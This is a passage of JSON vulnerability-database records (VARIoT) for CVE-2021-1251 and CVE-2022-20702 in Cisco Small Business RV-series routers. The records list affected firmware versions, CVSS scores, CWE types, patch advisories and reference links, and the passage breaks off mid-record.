                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1251",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1251",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1251",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-26111",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-435",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1251",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1251",
            "trust": 3.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.1171.3",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "id": "VAR-202104-0377",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          }
        ],
        "trust": 1.1394850175
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:37:02.684000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-multi-lldp-u7e4chCe",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe"
          },
          {
            "title": "Patch for Cisco Link Layer Discovery Protocol Denial of Service Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/257011"
          },
          {
            "title": "Cisco Link Layer Discovery Protocol Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147017"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-multi-lldp-u7e4chCe"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-401",
            "trust": 1.0
          },
          {
            "problemtype": "Buffer error (CWE-119) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1251"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.1171.3"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-09T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "date": "2021-04-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "date": "2021-12-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "date": "2021-04-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "date": "2021-04-08T04:15:11.860000",
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-09T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "date": "2021-12-13T02:45:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "date": "2024-11-21T05:43:55.783000",
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router \u00a0 Buffer Error Vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0326

    Vulnerability from variot - Updated: 2024-11-23 22:04

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: execute arbitrary code; elevate privileges; execute arbitrary commands; bypass authentication and authorization protections; fetch and run unsigned software; cause denial of service (DoS). For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (a DoS condition). This vulnerability allows local attackers to escalate privileges on affected installations of Cisco RV340 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the utility-ping-request script. The issue results from the creation of a temporary file with insecure permissions. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0326",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.7,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jeongun Baek of Diffense",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          }
        ],
        "trust": 1.3
      },
      "cve": "CVE-2022-20702",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2022-20702",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2022-20702",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20702",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20702",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "LOCAL",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 7.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.0,
                "id": "CVE-2022-20702",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20702",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20702",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20702",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20702",
                "trust": 0.7,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-163",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20702",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows local attackers to escalate privileges on affected installations of Cisco RV340 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the utility-ping-request script. The issue results from the creation of a temporary file with insecure permissions. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20702",
            "trust": 4.0
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-420",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15946",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "id": "VAR-202202-0326",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T22:04:59.426000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=183841"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 1.8,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-420/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20702"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/alphabugx/cve-2022-23305"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "date": "2023-05-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "date": "2022-02-10T18:15:09.137000",
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "date": "2023-11-07T00:00:00",
